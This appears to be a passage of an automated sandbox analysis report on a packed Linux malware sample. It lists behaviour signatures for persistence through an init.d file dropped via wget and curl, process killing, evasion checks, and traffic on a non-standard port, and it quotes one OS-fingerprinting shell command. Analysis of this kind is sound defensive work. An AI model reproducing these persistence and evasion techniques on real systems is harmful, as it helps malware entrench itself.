Source: /bin/wget (PID: 3104)File written: /etc/rc.d/init.d/start
Source: /bin/curl (PID: 3129)File written: /etc/rc.d/init.d/startJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58610
Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58616

Malware Analysis System Evasion:

barindex
Reads CPU information from /proc indicative of miner or evasive malwareShow sources
Source: /bin/grep (PID: 3191)Reads CPU info from proc file: /proc/cpuinfo
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: /bin/free (PID: 3205)Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)Show sources
Source: /bin/sh (PID: 2877)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3102)Queries kernel information via 'uname':
Source: /bin/wget (PID: 3104)Queries kernel information via 'uname':
Source: /bin/curl (PID: 3129)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3191)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3200)Queries kernel information via 'uname':
Source: /bin/free (PID: 3205)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3227)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3248)Queries kernel information via 'uname':
Source: /bin/uname (PID: 3248)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3261)Queries kernel information via 'uname':
Source: /bin/uname (PID: 3261)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3267)Queries kernel information via 'uname':
Source: /bin/ps (PID: 3274)Queries kernel information via 'uname':

Language, Device and Operating System Detection:

barindex
Queries the installed Ubuntu/CentOS releaseShow sources
Source: /tmp/agJPi4fCrP (PID: 3227)Arguments: /bin/sh -> sh -c "if [ -f /usr/bin/yum ]; then cat /etc/system-release|head -n1; elif [ -f /usr/bin/apt-get ]; then lsb_release -d|awk '{$1= \"\"; print $0}'|head -n1 ; elif [ -f /usr/bin/install ]; then busybox|head -n1|awk '{print $1\" \"$2}';fi"
Source: /bin/sh (PID: 3239)Arguments: /bin/cat -> cat /etc/system-release


Runtime Messages

Command:/tmp/agJPi4fCrP
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1019092 Sample: agJPi4fCrP Startdate: 13/12/2019 Architecture: LINUX Score: 64 58 dynddns.cf 2->58 60 72.33.238.154, 23 WISC-MADISON-AS-UniversityofWisconsinMadisonUS United States 2->60 62 99 other IPs or domains 2->62 66 Uses known network protocols on non-standard ports 2->66 68 Sample is packed with UPX 2->68 10 agJPi4fCrP 2->10         started        signatures3 process4 process5 12 agJPi4fCrP 10->12         started        14 agJPi4fCrP sh 10->14         started        process6 16 agJPi4fCrP sh 12->16         started        18 agJPi4fCrP sh grep 12->18         started        21 agJPi4fCrP sh 12->21         started        25 5 other processes 12->25 23 sh 14->23         started        signatures7 27 sh 16->27         started        64 Searches for CPU information (likely indicative for DDoS capability) 18->64 29 sh free 21->29         started        31 sh grep 21->31         started        33 sh awk 21->33         started        35 sh killall 23->35         started        38 sh killall 23->38         started        40 sh killall 23->40         started        42 sh cat 25->42         started        44 3 other processes 25->44 process8 signatures9 46 sh curl 27->46         started        50 sh wget 27->50         started        52 sh chmod 27->52         started        54 7 other processes 27->54 70 Terminates several processes with shell command 'killall' 35->70 process10 file11 56 /etc/rc.d/init.d/start, ELF 46->56 dropped 72 Sample tries to persist itself using System V runlevels 46->72 74 Sets full permissions to files and/or directories 52->74 signatures12

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
agJPi4fCrPSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x8ef2:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x8f61:$s2: $Id: UPX
  • 0x8f12:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus and Machine Learning Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.